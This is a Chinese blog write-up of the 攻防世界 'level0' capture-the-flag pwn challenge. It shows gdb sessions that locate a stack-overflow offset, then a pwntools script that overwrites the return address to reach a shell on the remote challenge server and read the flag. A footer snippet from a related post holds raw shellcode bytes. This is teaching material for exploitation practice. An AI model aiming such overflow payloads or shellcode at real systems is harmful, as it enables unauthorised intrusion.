攻防世界-level0

最新推荐文章于 2024-07-28 15:46:11 发布
最新推荐文章于 2024-07-28 15:46:11 发布
阅读量444 收藏
点赞数
分类专栏: 笔记 ctf 攻防世界CTF 文章标签: python 安全 ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47210241/article/details/129966674
版权
ctf 同时被 3 个专栏收录
23 篇文章 1 订阅
订阅专栏
攻防世界CTF
23 篇文章 0 订阅
订阅专栏
笔记
19 篇文章 0 订阅
订阅专栏

攻防世界-level0

image-20230405100255682

gdb-peda$ run
Starting program: /home/giantbranch/Desktop/study/level0 
Hello, World
^C
Program received signal SIGINT, Interrupt.

[----------------------------------registers-----------------------------------]
RAX: 0xfffffffffffffe00 
RBX: 0x0 
RCX: 0x7ffff7b04260 (<__read_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x200 
RSI: 0x7fffffffdd90 --> 0x0 
RDI: 0x0 
RBP: 0x7fffffffde10 --> 0x7fffffffde30 --> 0x400600 (<__libc_csu_init>:	push   r15)
RSP: 0x7fffffffdd88 --> 0x4005c4 (<vulnerable_function+30>:	leave)
RIP: 0x7ffff7b04260 (<__read_nocancel+7>:	cmp    rax,0xfffffffffffff001)
R8 : 0x400670 (<__libc_csu_fini>:	repz ret)
R9 : 0x7ffff7de7ab0 (<_dl_fini>:	push   rbp)
R10: 0x37b 
R11: 0x246 
R12: 0x4004a0 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdf10 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff7b04257 <read+7>:	jne    0x7ffff7b04269 <read+25>
   0x7ffff7b04259 <__read_nocancel>:	mov    eax,0x0
   0x7ffff7b0425e <__read_nocancel+5>:	syscall 
=> 0x7ffff7b04260 <__read_nocancel+7>:	cmp    rax,0xfffffffffffff001
   0x7ffff7b04266 <__read_nocancel+13>:	jae    0x7ffff7b04299 <read+73>
   0x7ffff7b04268 <__read_nocancel+15>:	ret    
   0x7ffff7b04269 <read+25>:	sub    rsp,0x8
   0x7ffff7b0426d <read+29>:	call   0x7ffff7b220d0 <__libc_enable_asynccancel>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdd88 --> 0x4005c4 (<vulnerable_function+30>:	leave)
0008| 0x7fffffffdd90 --> 0x0 
0016| 0x7fffffffdd98 --> 0x0 
0024| 0x7fffffffdda0 --> 0xff00 
0032| 0x7fffffffdda8 --> 0x0 
0040| 0x7fffffffddb0 --> 0x0 
0048| 0x7fffffffddb8 --> 0x0 
0056| 0x7fffffffddc0 --> 0x4005c6 (<main>:	push   rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGINT
0x00007ffff7b04260 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:84
84	../sysdeps/unix/syscall-template.S: No such file or directory.
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
 RAX  0xfffffffffffffe00
 RBX  0x0
 RCX  0x7ffff7b04260 (__read_nocancel+7) ◂— cmp    rax, -0xfff
 RDX  0x200
 RDI  0x0
 RSI  0x7fffffffdd90 ◂— 0x0
 R8   0x400670 (__libc_csu_fini) ◂— ret    
 R9   0x7ffff7de7ab0 (_dl_fini) ◂— push   rbp
 R10  0x37b
 R11  0x246
 R12  0x4004a0 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffdf10 ◂— 0x1
 R14  0x0
 R15  0x0
 RBP  0x7fffffffde10 —▸ 0x7fffffffde30 —▸ 0x400600 (__libc_csu_init) ◂— push   r15
 RSP  0x7fffffffdd88 —▸ 0x4005c4 (vulnerable_function+30) ◂— leave  
 RIP  0x7ffff7b04260 (__read_nocancel+7) ◂— cmp    rax, -0xfff
───────────────────────────────────[ DISASM ]───────────────────────────────────
 ► 0x7ffff7b04260 <__read_nocancel+7>     cmp    rax, -0xfff
   0x7ffff7b04266 <__read_nocancel+13>    jae    read+73 <0x7ffff7b04299>
    ↓
   0x7ffff7b04299 <read+73>               mov    rcx, qword ptr [rip + 0x2ccbd8]
   0x7ffff7b042a0 <read+80>               neg    eax
   0x7ffff7b042a2 <read+82>               mov    dword ptr fs:[rcx], eax
   0x7ffff7b042a5 <read+85>               or     rax, 0xffffffffffffffff
   0x7ffff7b042a9 <read+89>               ret    
 
   0x7ffff7b042aa                         nop    word ptr [rax + rax]
   0x7ffff7b042b0 <write>                 cmp    dword ptr [rip + 0x2d2489], 0 <0x7ffff7dd6740>
   0x7ffff7b042b7 <write+7>               jne    write+25 <0x7ffff7b042c9>
    ↓
   0x7ffff7b042c9 <write+25>              sub    rsp, 8
───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ rsp  0x7fffffffdd88 —▸ 0x4005c4 (vulnerable_function+30) ◂— leave  
01:0008│ rsi  0x7fffffffdd90 ◂— 0x0
... ↓
03:0018│      0x7fffffffdda0 ◂— 0xff00
04:0020│      0x7fffffffdda8 ◂— 0x0
... ↓
07:0038│      0x7fffffffddc0 —▸ 0x4005c6 (main) ◂— push   rbp
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► f 0     7ffff7b04260 __read_nocancel+7
   f 1           4005c4 vulnerable_function+30
   f 2           4005f3 main+45
   f 3     7ffff7a2d830 __libc_start_main+240
Program received signal SIGINT
gdb-peda$ pattern_create 1000
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'
gdb-peda$ pattern_create 1000
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x'
gdb-peda$ run
Starting program: /home/giantbranch/Desktop/study/level0 
Hello, World
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyAAzA%%A%sA%BA%$A%nA%CA%-A%(A%DA%;A%)A%EA%aA%0A%FA%bA%1A%GA%cA%2A%HA%dA%3A%IA%eA%4A%JA%fA%5A%KA%gA%6A%LA%hA%7A%MA%iA%8A%NA%jA%9A%OA%kA%PA%lA%QA%mA%RA%oA%SA%pA%TA%qA%UA%rA%VA%tA%WA%uA%XA%vA%YA%wA%ZA%xA%yA%zAs%AssAsBAs$AsnAsCAs-As(AsDAs;As)AsEAsaAs0AsFAsbAs1AsGAscAs2AsHAsdAs3AsIAseAs4AsJAsfAs5AsKAsgAs6AsLAshAs7AsMAsiAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x200 
RBX: 0x0 
RCX: 0x7ffff7b04260 (<__read_nocancel+7>:	cmp    rax,0xfffffffffffff001)
RDX: 0x200 
RSI: 0x7fffffffdd90 ("AAA%AAsAABAA$AA"...)
RDI: 0x0 
RBP: 0x6c41415041416b41 ('AkAAPAAl')
RSP: 0x7fffffffde18 ("AAQAAmAARAAoAAS"...)
RIP: 0x4005c5 (<vulnerable_function+31>:	ret)
R8 : 0x400670 (<__libc_csu_fini>:	repz ret)
R9 : 0x7ffff7de7ab0 (<_dl_fini>:	push   rbp)
R10: 0x37b 
R11: 0x246 
R12: 0x4004a0 (<_start>:	xor    ebp,ebp)
R13: 0x7fffffffdf10 ("vA%YA%wA%ZA%xA%"...)
R14: 0x0 
R15: 0x0
EFLAGS: 0x10217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4005ba <vulnerable_function+20>:	mov    edi,0x0
   0x4005bf <vulnerable_function+25>:	call   0x400470 <read@plt>
   0x4005c4 <vulnerable_function+30>:	leave  
=> 0x4005c5 <vulnerable_function+31>:	ret    
   0x4005c6 <main>:	push   rbp
   0x4005c7 <main+1>:	mov    rbp,rsp
   0x4005ca <main+4>:	sub    rsp,0x10
   0x4005ce <main+8>:	mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde18 ("AAQAAmAARAAoAAS"...)
0008| 0x7fffffffde20 ("RAAoAASAApAATAA"...)
0016| 0x7fffffffde28 ("ApAATAAqAAUAArA"...)
0024| 0x7fffffffde30 ("AAUAArAAVAAtAAW"...)
0032| 0x7fffffffde38 ("VAAtAAWAAuAAXAA"...)
0040| 0x7fffffffde40 ("AuAAXAAvAAYAAwA"...)
0048| 0x7fffffffde48 ("AAYAAwAAZAAxAAy"...)
0056| 0x7fffffffde50 ("ZAAxAAyAAzA%%A%"...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c5 in vulnerable_function ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
─────────────────────────────────[ REGISTERS ]──────────────────────────────────
 RAX  0x200
 RBX  0x0
 RCX  0x7ffff7b04260 (__read_nocancel+7) ◂— cmp    rax, -0xfff
 RDX  0x200
 RDI  0x0
 RSI  0x7fffffffdd90 ◂— 0x4173414125414141 ('AAA%AAsA')
 R8   0x400670 (__libc_csu_fini) ◂— ret    
 R9   0x7ffff7de7ab0 (_dl_fini) ◂— push   rbp
 R10  0x37b
 R11  0x246
 R12  0x4004a0 (_start) ◂— xor    ebp, ebp
 R13  0x7fffffffdf10 ◂— 0x4177254159254176 ('vA%YA%wA')
 R14  0x0
 R15  0x0
 RBP  0x6c41415041416b41 ('AkAAPAAl')
 RSP  0x7fffffffde18 ◂— 0x41416d4141514141 ('AAQAAmAA')
 RIP  0x4005c5 (vulnerable_function+31) ◂— ret    
───────────────────────────────────[ DISASM ]───────────────────────────────────
   0x4005c4 <vulnerable_function+30>    leave  
 ► 0x4005c5 <vulnerable_function+31>    ret    <0x41416d4141514141>









───────────────────────────────────[ STACK ]────────────────────────────────────
00:0000│ rsp  0x7fffffffde18 ◂— 0x41416d4141514141 ('AAQAAmAA')
01:0008│      0x7fffffffde20 ◂— 0x415341416f414152 ('RAAoAASA')
02:0010│      0x7fffffffde28 ◂— 0x7141415441417041 ('ApAATAAq')
03:0018│      0x7fffffffde30 ◂— 0x4141724141554141 ('AAUAArAA')
04:0020│      0x7fffffffde38 ◂— 0x4157414174414156 ('VAAtAAWA')
05:0028│      0x7fffffffde40 ◂— 0x7641415841417541 ('AuAAXAAv')
06:0030│      0x7fffffffde48 ◂— 0x4141774141594141 ('AAYAAwAA')
07:0038│      0x7fffffffde50 ◂— 0x417941417841415a ('ZAAxAAyA')
─────────────────────────────────[ BACKTRACE ]──────────────────────────────────
 ► f 0           4005c5 vulnerable_function+31
   f 1 41416d4141514141
   f 2 415341416f414152
   f 3 7141415441417041
   f 4 4141724141554141
   f 5 4157414174414156
   f 6 7641415841417541
   f 7 4141774141594141
   f 8 417941417841415a
   f 9 7325412525417a41
   f 10 2541242541422541
Program received signal SIGSEGV (fault address 0x0)
gdb-peda$ siAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB%ABsABBAB$ABnABCAB-AB(ABDAB;AB)ABEABaAB0ABFABbAB1ABGABcAB2ABHABdAB3ABIABeAB4ABJABfAB5ABKABgAB6ABLABhAB7ABMABiAB8ABNABjAB9ABOABkABPABlABQABmABRABoABSABpABTABqABUABrABVABtABWABuABXABvABYABwABZABxAByABzA$%A$sA$BA$$A$nA$CA$-A$(A$DA$;A$)A$EA$aA$0A$FA$bA$1A$GA$cA$2A$HA$dA$3A$IA$eA$4A$JA$fA$5A$KA$gA$6A$LA$hA$7A$MA$iA$8A$NA$jA$9A$OA$kA$PA$lA$QA$mA$RA$oA$SA$pA$TA$qA$UA$rA$VA$tA$WA$uA$XA$vA$YA$wA$ZA$x
Undefined command: "siAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB".  Try "help".
gdb-peda$ 
Undefined command: "siAs8AsNAsjAs9AsOAskAsPAslAsQAsmAsRAsoAsSAspAsTAsqAsUAsrAsVAstAsWAsuAsXAsvAsYAswAsZAsxAsyAszAB".  Try "help".
gdb-peda$ pattern_offset AAQAAmAA
AAQAAmAA found at offset: 136
gdb-peda$ pattern_offset AAQAAmAA
AAQAAmAA found at offset: 136
gdb-peda$ pattern_offset 
Error: missing argument
Search for offset of a value in cyclic pattern
Set "pattern" option for basic/extended pattern type
Usage:
    pattern_offset value

gdb-peda$ pattern_offset $rbp
7800587842530405185 found at offset: 128
gdb-peda$

image-20230405100403674

image-20230405100418080

image-20230405100429975

image-20230405100446395

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io=remote('61.147.171.105',62223)
#nc 61.147.171.105 62223
pad=136

pause()

ret_addr=0x0000000000400596
payload=b'A'*pad+p64(ret_addr)

delimiter='World'

io.sendlineafter(delimiter,payload)
io.interactive()

#0000000000400596


giantbranch@ubuntu:~/Desktop/study$ python level0.py 
[+] Opening connection to 61.147.171.105 on port 62223: Done
[*] Paused (press any to continue)
[DEBUG] Received 0xd bytes:
    'Hello, World\n'
[DEBUG] Sent 0x91 bytes:
    00000000  41 41 41 41  41 41 41 41  41 41 41 41  41 41 41 41  │AAAA│AAAA│AAAA│AAAA│
    *
    00000080  41 41 41 41  41 41 41 41  96 05 40 00  00 00 00 00  │AAAA│AAAA│··@·│····│
    00000090  0a                                                  │·│
    00000091
[*] Switching to interactive mode

$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
[DEBUG] Received 0x24 bytes:
    'bin\n'
    'dev\n'
    'flag\n'
    'level0\n'
    'lib\n'
    'lib32\n'
    'lib64\n'
bin
dev
flag
level0
lib
lib32
lib64
$ cat flag
[DEBUG] Sent 0x9 bytes:
    'cat flag\n'
[DEBUG] Received 0x2d bytes:
    'cyberpeace{5789113144e0024092a69c9e11b0f82a}\n'
cyberpeace{5789113144e0024092a69c9e11b0f82a}
$
32进制
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1449
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
攻防世界 level0
weixin_45846085的博客
05-15 605
攻防世界第一题,很简单一个栈溢出。 首先拿到一个elf文件,把它放到ubuntu中检查一下 动态链接,小端序,64位只打开了NX保护,接下来看一下文件中引用的字符串 发现有system和/bin/sh,使用64位的IDA反编译一下。 只有一个脆弱函数,很明显了。 read出存在栈溢出漏洞,接下来寻找一下system和/bin/sh 发现存在后门函数,我们之接利用栈溢出漏洞控制程序跳转到callsystem处就可以getshell了。 gdb调试得到需要填充的垃圾数据 接下来看exp 运行脚本,成功
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1386
学习pwn开始,慢慢来不要急
初学pwn-攻防世界(level0)
天柱的博客
08-27 997
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
攻防世界-level2
qq_45771413的博客
04-22 346
查看保护 IDA分析 在vulnerable_function里找到了读取溢出: 字符串长度136,读取长度256,读多了。 这里看到了system,以为可以获取shell,结果发现就是个普通的输出字符串……(菜) 寻找敏感权限: 直接查找字符串找到了 system /bin/sh 但是他俩不在一块儿。第一次直接拼接/bin/sh失败 后面尝试在填充buf和ebp后缝合system和/bin/sh,但是一直不成功。 尝试了两个system的内存地址也是如此…… 上网看别人wp,发现真正调用sy
攻防世界--pwn1
qq_73149934的博客
02-22 493
canary,ret2libc 注意:只能打通远端,且libc中的systembinsh没用,用onegadget打通,在用onegadget时,注意rax需要为0,通过汇编看出选择3.exit退出时rax清0,可以onegadget Exp she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" she_amd64_30=b"\x48\x31\xd2\x48\xbb
攻防世界PWN-level0
Deeeelete的博客
11-12 2511
题目:level0 老规矩先进PE 查看是64位程序,可以考虑直接IDA莽,也可以进checksec查一下详细参数 比较脆,无PIE且没了栈保护(Stack-canary),容易GOT改写( RELRO) 简单运行一遍,发现是hello word 进64位IDA 鼠标悬停在main函数上按f5反编译 查看源码: 过于简单,没啥可用的信息,双击它return的脆弱函数进一步查看 int __cdecl main(int argc, const char **argv, const
攻防世界-level3-Writeup
SkYe's Blog
05-15 492
level3 [collapse title=“展开查看详情” status=“false”] 考点:栈溢出、ROP(ret2libc) ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] write(1, "Input:\n", 7u); return read(0, &amp;buf, 0x100u); //溢出 } 打开了 NX 保护栈数据不可执行,程序没有预留后门。解决办法就是 ret2libc ,这
攻防世界_level2
RMC131的博客
04-10 4283
checksec IDA exp from pwn import * p = remote('111.200.241.244',58154) payload = b'a' * 0x8c + p32(0x08048320) + p32(0) + p32(0x0804A024) p.recvuntil("Input:") p.send(payload) p.interactive() 运行得到flag
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
攻防世界nice-bgm杂项
11-20
在网络安全领域,"攻防世界"是一个广受欢迎的在线平台,提供各种安全挑战,帮助学习者提升他们的黑客防御和攻击技能。"nice-bgm杂项"是其中的一个挑战,属于"misc"类别,这意味着它可能涉及到多种不同类型的解题技巧...
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
qq_64603703的博客
07-27 688
详细解说数据分析pandas库中的常用方法
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 971
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
全面解析 SnowNLP:中文文本处理、情感分析
有勇气的牛排博客
07-24 516
SnowNLP 是一个专门用于处理中文文本的 Python库。分词情感分析关键词提取文本分类拼音转换繁体转简体词相似度计算等测试环境:Python3.10.9尚未测出该功能text = "有勇气的牛排写的文章通俗易懂,爱了爱了"文本分类使用的是 SnowNLP 的情感分析模型。
Chapter 18 Python异常
最新发布
2302_80253507的博客
07-28 778
Python中,异常是一种特定的对象,能够在程序运行过程中被抛出和处理。有效地管理异常不仅可以增强程序的稳定性,还可以提高用户体验,使程序能够优雅地处理错误情况。本章详细讲解了异常的基本概念以及如何捕获和处理异常。
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码来获取敏感信息或者执行未经授权的操作。 为了详细了解攻防世界-baby_web的攻击和防御方法,我们可以进行以下步骤: 1. 分析源代码:通过查看源代码,我们可以了解应用程序的结构和逻辑,以及可能存在的漏洞点。 2. 注入攻击:尝试使用注入攻击来获取数据库信息或者执行其他恶意操作。可以使用工具如sqlmap来自动化进行注入测试。 3. 防御措施:了解并实施防御措施,如输入验证、参数化查询、安全编码等,以防止注入攻击和其他常见的安全漏洞。 请注意,进行任何形式的攻击都是非法的,除非您是经过授权的安全专家或者在合法的渗透测试环境中进行。在现实世界中,攻击和防御是一个持续的过程,需要不断学习和更新知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值